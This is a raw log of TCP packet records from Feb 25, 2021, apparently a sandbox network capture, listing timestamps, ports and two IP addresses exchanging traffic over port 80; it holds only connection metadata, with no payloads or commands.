Feb 25, 2021 11:04:07.949187040 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.949201107 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.949224949 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.949229956 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.949276924 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.949659109 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.949754000 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.949781895 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.949804068 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.949811935 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.949857950 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:09.336656094 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:09.398994923 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:09.409914970 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:09.409953117 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:09.409960032 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:09.409976006 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:09.409991980 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:09.410007954 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:09.410022974 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:09.410036087 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:09.410042048 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:09.410059929 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:09.410078049 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:09.410094023 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:09.410096884 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:09.410109043 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:09.410125017 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:09.410135984 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:09.410149097 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:09.410156012 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:09.410167933 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:09.410187960 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:09.410198927 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:09.410211086 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:09.410223007 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:09.410234928 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:09.410247087 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:09.410336971 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:09.410356045 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:09.410360098 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:09.410378933 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:09.410398006 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:09.410406113 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:09.410418034 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:09.410435915 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:09.410439968 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:09.410450935 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:09.410499096 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:09.410553932 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:09.410604000 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:04.776989937 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:04.823962927 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:04.824220896 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:04.825196981 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:04.872008085 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:04.940366030 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:04.940398932 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:04.940412998 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:04.940434933 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:04.940440893 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:04.940454006 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:04.940465927 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:04.940481901 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:04.940485001 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:04.940495014 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:04.940510988 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:04.940543890 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:04.940949917 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:04.941356897 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:04.941371918 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:04.942502022 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:04.942519903 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:04.942559958 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:04.943586111 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:04.943603039 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:04.943636894 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:04.944503069 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:04.944705963 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:04.944730043 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:04.944802046 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:04.945795059 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:04.945815086 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:04.946882010 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:04.946897984 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:04.946933985 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:04.947973013 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:04.948255062 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:04.948290110 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:04.948343039 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:04.949064970 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:04.949079990 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:04.950160027 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:04.950180054 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:04.950201988 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:04.950284958 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:04.951323032 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:04.951353073 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:04.953948975 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:04.987399101 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:04.987440109 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:04.987632990 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:04.987752914 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:04.987766027 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:04.988159895 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:04.988914013 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:04.988938093 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:04.989034891 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:04.989980936 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:04.989999056 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:04.990097046 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:04.991096973 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:04.991123915 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:04.991566896 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:04.992223978 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:04.992721081 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:04.992736101 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:04.993845940 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:04.993864059 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:04.993908882 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:04.994923115 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:04.994937897 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:04.994971991 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:04.996020079 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:04.996035099 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:04.996072054 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:04.996130943 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:04.997184992 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:04.997200966 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:04.998238087 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:04.998255014 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:04.998294115 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:04.999366999 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:04.999382973 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:04.999409914 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.000365973 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.000442028 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.000458002 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.001517057 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.001533031 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.001569986 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.001621962 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.002655983 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.002672911 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.003771067 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.003787041 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.003834009 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.004839897 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.005357027 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.005418062 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.005420923 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.005477905 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.005945921 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.006521940 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.006551027 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.006694078 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.007597923 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.007613897 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.008681059 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.008697987 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.008738995 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.009777069 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.009794950 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.009835005 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.010766029 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.010850906 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.010868073 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.011024952 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.011949062 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.011962891 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.012025118 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.034459114 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.034480095 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.034876108 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.034889936 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.034934998 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.036273003 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.036289930 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.036331892 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.036983967 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.037000895 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.037033081 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.037987947 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.038247108 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.040669918 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.040685892 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.041028023 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.041156054 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.041169882 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.041944981 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.042211056 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.042233944 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.042324066 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.043272018 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.043287039 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.043859959 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.044276953 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.044294119 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.044680119 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.045320988 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.045335054 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.046386957 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.046412945 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.046432018 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.046520948 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.047424078 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.047449112 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.047506094 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.048440933 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.048469067 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.049465895 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.049485922 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.049500942 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.049582005 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.050551891 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.050570011 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.052050114 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.052143097 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.052417040 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.052438021 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.052505970 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.053504944 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.053523064 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.054536104 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.054550886 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.054591894 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.054672003 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.055680037 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.055707932 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.055820942 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.056540966 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.056561947 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.056633949 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.057456017 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.057476997 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.057554960 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.058415890 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.058434010 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.058497906 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.059310913 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.059326887 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.059410095 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.082015991 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.082046032 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.082515001 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.083069086 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.083086967 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.083811045 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.083826065 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.083832026 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.084043026 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.084774017 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.084789038 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.084887028 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.087841988 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.087862015 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.087963104 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.088649988 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.088665962 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.089032888 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.089046955 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.089078903 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.090599060 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.090615988 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.090657949 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.091402054 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.091420889 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.091459036 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.092250109 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.093151093 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.093175888 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.093266010 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.093442917 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.093456030 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.094144106 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.094225883 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.094244003 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.094495058 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.096250057 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.096280098 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.096375942 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.096540928 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.096554041 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.096713066 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.097281933 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.097305059 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.097487926 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.097985029 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.097997904 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.098651886 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.098669052 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.098687887 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.098754883 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.099340916 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.099355936 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.099426985 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.100080013 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.100095034 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.100177050 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.100733995 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.100748062 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.101430893 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.101444960 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.101479053 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.102125883 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.102139950 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.102174997 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.102813005 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.102827072 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.102857113 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.103497028 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.103509903 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.103543997 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.104017019 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.104166985 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.104186058 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.104428053 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.104881048 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.104896069 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.105571032 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.105586052 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.105623960 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.106262922 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.106277943 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.106312990 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.106952906 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.106967926 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.106997967 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.107656956 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.107671976 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.107708931 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.108355045 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.108371019 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.108406067 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.108452082 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.109055996 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.109081984 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.109159946 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.109770060 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.109786034 CET	80	49727	172.67.172.17	192.168.2.5
